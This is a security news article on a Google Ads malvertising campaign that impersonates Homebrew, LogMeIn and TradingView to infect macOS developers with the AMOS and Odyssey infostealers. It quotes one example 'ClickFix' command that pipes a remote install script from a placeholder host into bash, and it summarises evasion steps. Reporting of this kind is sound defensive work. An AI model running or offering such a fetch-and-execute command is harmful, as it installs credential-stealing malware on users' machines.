A sophisticated campaign is using Google Ads to distribute fake Homebrew, LogMeIn, and TradingView sites that trick macOS developers into executing terminal commands infecting their systems with AMOS and Odyssey infostealers. Researchers identified over 85 malicious domains employing 'ClickFix' techniques to bypass security protections. The malware harvests credentials, cryptocurrency wallets, and sensitive data while evading detection mechanisms.
)
A dangerous malvertising campaign is specifically targeting macOS developers by impersonating trusted platforms like Homebrew, LogMeIn, and TradingView through Google Ads. Researchers at Hunt.io have uncovered over 85 malicious domains designed to distribute infostealers like AMOS (Atomic macOS Stealer) and Odyssey Stealer, marking a significant escalation in attacks against Apple's developer community.
The Attack Vector: ClickFix and Malicious Terminal Commands
The campaign uses sophisticated 'ClickFix' techniques where victims are directed to fake download portals via Google Search ads. These sites prompt users to copy and execute terminal commands disguised as installation steps or 'security verifications':
# Example of malicious command (base64 decoded)
curl -sL hxxp://malicious-domain/install.sh | bash
)
Fake Homebrew installation page prompting terminal command execution (Source: Hunt.io)
When executed, these commands:
- Fetch and decode an 'install.sh' script
- Download malware payloads while bypassing Gatekeeper protections
- Remove quarantine flags to evade macOS security
- Kill processes like OneDrive updaters to avoid detection
Advanced Malware Payloads: AMOS and Odyssey
The payloads demonstrate alarming sophistication:
- AMOS ($1,000/month MaaS subscription): Collects hardware fingerprints, browser data, crypto wallets, and Keychain items. Recently added persistent backdoor capabilities.
- Odyssey Stealer (AMOS fork): Targets 100+ crypto extensions, compresses stolen data into ZIP files, and uses XPC services to blend with legitimate processes.
)
Fake TradingView site using fake 'security confirmation' to deliver malware (Source: Hunt.io)
Why Developers Are Prime Targets
This campaign strategically exploits macOS developers' workflow:
- Trust in package managers: Homebrew's ubiquity makes it ideal for impersonation
- Sudo privileges: Developers frequently use terminal with elevated access
- High-value assets: Development environments contain credentials, API keys, and proprietary code
- Google Ads legitimacy: Malicious sites gain credibility through paid search placement
The Bigger Picture: Supply Chain Implications
This isn't Homebrew's first exploitation—threat actors consistently weaponize open-source tools. The Google Ads angle reveals a dangerous trend: attackers paying premium rates to compromise high-value targets. With AMOS operators offering malware-as-a-service, such attacks will likely proliferate.
Protecting Your System
- Never paste unfamiliar terminal commands
- Verify URLs before downloading developer tools
- Use package managers only from official sources
- Monitor for suspicious process termination (e.g., OneDrive updaters)
As infostealers evolve to bypass macOS security layers, developers must treat every installation step as a potential attack surface. This campaign proves that even Google's ad ecosystem can become a weapon against those building our software.
Comments
Please log in or register to join the discussion